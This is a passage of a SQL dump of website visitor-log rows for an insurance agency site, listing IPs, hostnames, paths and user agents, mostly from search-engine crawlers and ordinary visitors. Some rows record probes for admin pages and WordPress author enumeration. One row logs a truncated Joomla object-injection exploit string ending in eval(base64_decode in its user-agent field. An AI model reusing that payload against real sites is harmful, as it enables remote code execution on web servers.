Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18479,'0b_ddc249b5982ac36c40f9318635204248','1460943010','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18482,'0b_17bf89c40e87ec3780b60e85946fc4ae','1460943196','125.255.167.66','mail.rema.com.au','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiT0968hZfMAhXLjJQKHfb5C1kQFgg4MAM&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.119745492,d.dGo','',0,'Win7 x64','IE 11','au','1280 x 1024','','','','','','0','0',0),(18483,'0b_17bf89c40e87ec3780b60e85946fc4ae','1460943199','125.255.167.66','mail.rema.com.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','au','1280 x 1024','','','','','','0','0',0),(18486,'0b_17bf89c40e87ec3780b60e85946fc4ae','1460943220','125.255.167.66','mail.rema.com.au','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','au','1280 x 1024','','','','','','0','0',0),(18488,'0b_17bf89c40e87ec3780b60e85946fc4ae','1460943236','125.255.167.66','mail.rema.com.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','au','1280 x 1024','','','','','','0','0',0),(18491,'0b_3eddac31d3380b4169b5e5c5c81a4bba','1460943367','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18492,'0b_b1bbeb13094eb93f27b19ddb6467c049','1460943542','130.185.155.10','130.185.155.10','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18495,'0b_b1bbeb13094eb93f27b19ddb6467c049','1460943552','130.185.155.10','130.185.155.10','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18498,'0b_b1bbeb13094eb93f27b19ddb6467c049','1460943562','130.185.155.10','130.185.155.10','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18501,'0b_4d75094cd89ec861a39b2cf47f318420','1460944888','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18503,'0b_b878741cc97c838c2abd2ce203adfcdd','1460945281','157.55.39.40','msnbot-157-55-39-40.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18504,'0b_feb43ca1540cde0f62a7d3bbc974f81b','1460945939','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18507,'0b_0161fb28d88cde42a8027ab5e906ed5f','1460945993','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(18510,'0b_a2a5acdb33df41e1dabbb14b2032786e','1460946835','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18512,'0b_d4f32a30d534552242b4fce4a1a2e4f9','1460949639','46.4.123.172','static.172.123.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18515,'0b_d4f32a30d534552242b4fce4a1a2e4f9','1460949641','46.4.123.172','static.172.123.4.46.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18516,'0b_779e4b21fc6d4dffef2452fc3a2d7109','1460950542','49.177.150.193','c49-177-150-193.frank4.vic.optusnet.com.au','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com.au/','_notprovided_',1,'Win10','Chrome 49','au','','Google AU','','','','','0','0',0),(18519,'0b_779e4b21fc6d4dffef2452fc3a2d7109','1460950546','49.177.150.193','c49-177-150-193.frank4.vic.optusnet.com.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','au','','','','','','','0','0',0),(18521,'0b_ae1f9760358f285d27fdedfe55eebe3a','1460951066','157.55.39.40','msnbot-157-55-39-40.search.msn.com','/SSO/235_39.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18522,'0b_ddf1453f37fc6c63338e699d1ec863fa','1460951360','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(18525,'0b_d6583eda016f98b20db1b0c793388ccb','1460951363','100.43.91.1','spider-100-43-91-1.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18527,'0b_fc25205b87929f140227091507996d06','1460951490','100.43.81.152','spider-100-43-81-152.yandex.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18528,'0b_89211cb366894c5d42021483343a2cb1','1460952779','157.55.39.25','msnbot-157-55-39-25.search.msn.com','[404] /pdf/bankers_companies_ok_to_convert_from.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18530,'0b_218234bdd3e73e978c2138c64d0ef7ef','1460957552','66.249.64.89','crawl-66-249-64-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18533,'0b_0e2d3173e18eed9b1b96ad45b845444f','1460957553','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(18534,'0b_218234bdd3e73e978c2138c64d0ef7ef','1460957780','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18537,'0b_218234bdd3e73e978c2138c64d0ef7ef','1460957794','66.249.64.29','crawl-66-249-64-29.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18539,'0b_71b03a852f1073caf26cc65876c6a5a9','1460959686','96.238.89.4','static-96-238-89-4.nrflva.fios.verizon.net','/administrator/','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win7','Firefox 31','ot','','','','','','','0','0',0),(18540,'0b_a1525ec0b745ea24a4b42cb8005357e4','1460961459','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18543,'0b_3e3545c6e9cb6980b695becc51a6deca','1460963734','91.219.237.97','no-hostname.azar-a.net','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'Win7','Firefox 15','ua','','','','','','','0','0',0),(18546,'0b_91937ea6d5539e220bb364413c18d8d5','1460963799','192.187.114.11','push-router.cakestandchar.net','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:3738:\\\"eval(base64_decode','','',0,'','','','','','Feed Reader','feed reader','','','0','0',0),(18549,'0b_e5b1036a50c4c6e2ebf98fc671402ec7','1460963904','52.90.188.138','ec2-52-90-188-138.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(18551,'0b_6224462770811254385854ef6ad72d94','1460968367','157.55.39.40','msnbot-157-55-39-40.search.msn.com','[404] /pdf/avoid_1099.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18552,'0b_6224462770811254385854ef6ad72d94','1460968571','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18554,'0b_e8e5d5932069549b18e5e8505bc4716d','1460970973','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18555,'0b_7ec840fde8dd3340eea6a28ecca1547f','1460971211','188.163.110.39','sol-fttb.39.110.163.188.sovam.net.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinVista','Firefox 15','ru','','','','','','','0','0',0),(18557,'0b_a466f0611642cd5f7a99c3c852e6fc08','1460974085','54.173.181.243','ec2-54-173-181-243.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(18558,'0b_98f24ee3a88c389cd1043283a1b04a0b','1460975131','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18560,'0b_98f24ee3a88c389cd1043283a1b04a0b','1460975132','66.249.64.34','crawl-66-249-64-34.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18561,'0b_98f24ee3a88c389cd1043283a1b04a0b','1460975132','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18564,'0b_af184fb7ebdfb4728137969e9c9d250a','1460975907','66.249.64.34','crawl-66-249-64-34.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18566,'0b_b40d419bcbf8bec177df178a2a9bf363','1460982781','209.95.51.106','d15f336a.setaptr.net','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(18569,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984335','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjRxuLdnpjMAhUUTGMKHfD_DGAQFggfMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.119745492,d.cGc','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(18570,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984338','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(18573,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984351','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/carriers/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(18576,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984359','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(18579,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984360','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(18581,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984394','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/insentives/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(18584,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984409','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.empireins.com/insentives/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(18585,'0b_42ed9955843c3668d92d7a9a15291dc6','1460984410','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(18587,'0b_286b11b0cd9f8f4a98f0c2cd4f75c58b','1460984426','104.186.15.138','104-186-15-138.lightspeed.hstntx.sbcglobal.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','','','','','','','','0','0',0),(18588,'0b_76d3bccf3ebdeee6db4b28e1b6aab0de','1460985164','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(18591,'0b_76d3bccf3ebdeee6db4b28e1b6aab0de','1460985165','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(18594,'0b_76d3bccf3ebdeee6db4b28e1b6aab0de','1460986589','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18596,'0b_8779ff7d381be271ebaf9658e3e64d2f','1460987480','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18599,'0b_8779ff7d381be271ebaf9658e3e64d2f','1460987481','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18600,'0b_98e5af8e6f91833064cfd15b62fec39e','1460988340','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18602,'0b_fa6d66a60983cdb1f01d193dd348b64e','1460989153','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18603,'0b_8ac219e092385ef1b535c1c554cade31','1460989282','100.2.174.18','static-100-2-174-18.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18605,'0b_8ac219e092385ef1b535c1c554cade31','1460989283','100.2.174.18','static-100-2-174-18.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18606,'0b_98e5af8e6f91833064cfd15b62fec39e','1460989447','157.55.39.13','msnbot-157-55-39-13.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18609,'0b_76d3bccf3ebdeee6db4b28e1b6aab0de','1460989725','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(18612,'0b_76d3bccf3ebdeee6db4b28e1b6aab0de','1460989726','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18615,'0b_bf2fb3719a5b29ce2b849a0946eb2a64','1460989779','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18617,'0b_f68c6999549ce564c3a2fca97337ac04','1460990076','207.46.13.57','msnbot-207-46-13-57.search.msn.com','[404] /documents/Hartfordfacetoface.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18620,'0b_c9db2883522db4f9ea46cfc2389f520d','1460991797','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18621,'0b_c9db2883522db4f9ea46cfc2389f520d','1460991800','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18624,'0b_c9db2883522db4f9ea46cfc2389f520d','1460991803','184.154.139.23','placeholder.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18627,'0b_c9db2883522db4f9ea46cfc2389f520d','1460991805','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18629,'0b_c9db2883522db4f9ea46cfc2389f520d','1460991810','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18630,'0b_c9db2883522db4f9ea46cfc2389f520d','1460991813','184.154.139.23','placeholder.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18632,'0b_c9db2883522db4f9ea46cfc2389f520d','1460991817','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18635,'0b_5574cbe1f6c3d50b90a2f6f7867f5f12','1460992741','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18636,'0b_5574cbe1f6c3d50b90a2f6f7867f5f12','1460992743','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18639,'0b_a20a3bb6c81df1788c2fadb08816f41d','1460993069','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18641,'0b_94e4fcc30c887825bc1b3b99dfae780a','1460993549','180.76.15.147','baiduspider-180-76-15-147.crawl.baidu.com','/carriers/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(18642,'0b_1874ce7b2f92934a46ec7b266e61d04f','1460993911','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(18644,'0b_c40054cf12d15321f176c1b8c95f599a','1460994026','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18647,'0b_cac656e99f0764cf1a086964810bbae0','1460994034','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','0',0),(18648,'0b_c56a11db800339c744b9d286edd83760','1460994547','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18651,'0b_a526cdc5839233d218c33b387ccfed13','1460994572','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(18654,'0b_c56a11db800339c744b9d286edd83760','1460994917','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18657,'0b_c56a11db800339c744b9d286edd83760','1460994918','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18659,'0b_76d3bccf3ebdeee6db4b28e1b6aab0de','1460995181','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18662,'0b_76d3bccf3ebdeee6db4b28e1b6aab0de','1460995183','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18663,'0b_5fd27bcb2948f2ec57345ec47ef80474','1460995446','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18666,'0b_76fe5fdd8956e5bf1b7c6214241d238a','1460995506','46.119.113.162','sol-fttb.162.113.119.46.sovam.net.ua','/?author=1','','','',0,'','','ua','','','Unknown Spider','','','','0','0',0),(18668,'0b_ed19c9027cf1b1ecce69c3a94a1b886a','1460996712','216.81.71.91','216.81.71.91','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(18671,'0b_1d2f139c98cc10940c78e6b32ca3699a','1460998205','100.43.91.18','spider-100-43-91-18.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(18674,'0b_64a40622e69760a425efdec1afa86b5e','1460998205','141.8.143.232','spider-141-8-143-232.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(18677,'0b_64a40622e69760a425efdec1afa86b5e','1460998209','141.8.143.217','spider-141-8-143-217.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18680,'0b_1d2f139c98cc10940c78e6b32ca3699a','1460998212','100.43.91.11','spider-100-43-91-11.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18681,'0b_b89cf6f9c48e3939ee8eff5a4ea48984','1460998214','100.43.81.133','spider-100-43-81-133.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; 